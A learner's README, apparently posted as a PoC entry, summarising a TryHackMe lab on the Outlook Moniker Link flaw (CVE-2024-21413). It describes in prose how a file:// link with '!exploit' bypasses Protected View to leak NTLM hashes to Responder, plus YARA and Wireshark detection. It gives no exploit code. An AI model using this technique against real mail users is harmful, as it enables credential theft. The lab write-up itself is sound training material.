CVE-2024-21413 PoC — Microsoft Outlook Remote Code Execution Vulnerability

Source

Associated Vulnerability

Readme

### 🛡️ Moniker Link (CVE-2024-21413)

**Room:** [Moniker Link (CVE-2024-21413) — TryHackMe](https://tryhackme.com/room/monikerlink)  
**Status:** ✅ Completed  
**Date:** *30 May 2025*

---

### 🎯 Objective  
Understand and exploit CVE-2024-21413, a vulnerability in Microsoft Outlook that bypasses Protected View using Moniker Links to leak NTLM credentials. Learn how to perform the attack and detect or mitigate it.

---

### 🗝️ Key Concepts  
- **Moniker Link** — A type of hyperlink that can reference system components and applications in Windows using the COM model.
- **Protected View** — Outlook's read-only mode that blocks external content to protect users.
- **NTLM Hash Leak** — Triggering an SMB authentication attempt from the victim leaks their netNTLMv2 hash to the attacker.
- **file:// Exploit** — Adding `!exploit` to a file:// URL bypasses Protected View and triggers SMB connection.
- **Responder** — A tool used to capture NTLM hashes by listening for SMB authentication requests.
- **RCE (Remote Code Execution)** — The vulnerability also has the potential for code execution, though no public PoC currently exists.
- **Detection** — YARA rules and Wireshark can help detect attempted or successful exploitation.

---

### 🛠️ Tools Used  
- **Responder** — Captured the victim’s NTLM hash once the malicious link was clicked.
- **Python (smtplib)** — Used to send the malicious email with the Moniker Link to the victim.
- **Outlook (on vulnerable VM)** — Email client that parsed the Moniker Link and leaked credentials.
- **YARA** — Rule by Florian Roth to detect email indicators of compromise.
- **Wireshark** — Used to view the SMB authentication request and hash in transit.

---

### ⚠️ Challenges Faced  
- Modifying the Moniker Link syntax correctly to bypass Protected View required close attention to detail.  
- Adjusting the exploit script to match IP and mail server settings took a couple of attempts.

---

### 🧠 What I Learned  
- Even trusted software like Outlook can be tricked into leaking credentials with low-complexity attacks.  
- Small syntax changes (like `!exploit`) can completely bypass built-in protections.  
- YARA rules are useful for catching suspicious behaviour in email content.  
- Responder is a powerful tool for capturing authentication attempts — especially NTLM leaks over SMB.

---

### 🌐 Real-World Application:  
> A phishing email using a Moniker Link can be enough to leak NTLM hashes from Outlook users. In corporate environments, this could lead to lateral movement, privilege escalation, or pass-the-hash attacks — even before any malware is deployed.

---

### 💭 Reflections:  
- This CVE was both simple and powerful — just one click on a crafted link and credentials are leaked.  
- The attack chain was straightforward but highlights the importance of patching and monitoring.  

File Snapshot

 [4.0K]  /data/pocs/81db4a9b7d7ae7ed07f954104d36da7656982ce3
└── [2.9K]  README.md

0 directories, 1 file

Remarks